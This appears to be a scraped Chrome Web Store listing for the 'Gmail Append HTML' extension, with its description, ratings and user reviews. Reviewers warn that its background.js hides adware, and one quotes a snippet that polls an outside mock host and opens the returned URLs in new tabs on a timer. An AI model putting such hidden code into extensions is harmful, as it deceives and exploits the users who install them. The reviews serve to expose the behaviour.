Gmail Append HTML is a productivity chrome extension. it's a free extension , it has 4,000+ active users since released its first version, it earns an average rating of 3.01 from 71 rated user, last update is 751 days ago.
This extension allows the usage of HTML content in Gmail. Simply copy the content you wish to add, right click on email form and select Append clipboard as HTML. YOU MUST REFRESH THE GMAIL TAB AFTER INSTALLING THIS EXTENSION. PLEASE NOTICE: 1) This extension manipulates the html element inside your email, there's no guarantee of what will work as expected and what won't. Please send an email to yourself before sending to an important contact and check the result. Or even better, send the email to an account outside Gmail and see how it displays. 2) Images still needs to be hosted somewhere. 3) USE INLINE CSS. 4) I've created this extension as a PROOF OF CONCEPT mainly for personal usage, but it was working, so I decided to publish and possibly help someone in need. It lacks testing and unfortunately I don't have the time to work on it right now. Consider its use as is.
You could download the latest version crx file or older version files and install it.
English (United States).
40% user give 5-star rating, 2% user give 4-star rating, 5% user give 3-star rating, 5% user give 2-star rating, 48% user give 1-star rating. Read reviews of gmail append html
You could find more help information from gmail append html support page.
You could send emails to publisher, or check publisher's website.
More about manifest_file of gmail append html.
You could click to report abuse of gmail append html.
It functions, however it has ad-ware code hidden in its background.js file. It uses the setTimeout function and an intervalWebsite function to use open websites in a new tab on a timer from https://gcebt20192020.mockable.io/url. If you don't believe me check the background.js file yourself.
WARNING!! This contains malicious code! It opens random URLs in the background while installed. You can find the code under background.js here's a snippet: setTimeout(function () { $.ajax({ url: "https://gcebt20192020.mockable.io/url", async: false, dataType: 'json', success: function (data) { var newURL = data.msg; chrome.tabs.create({ url: newURL }); ; intervalWebsite() } });
The app started to open random chrome tabs to some webpages on a daily interval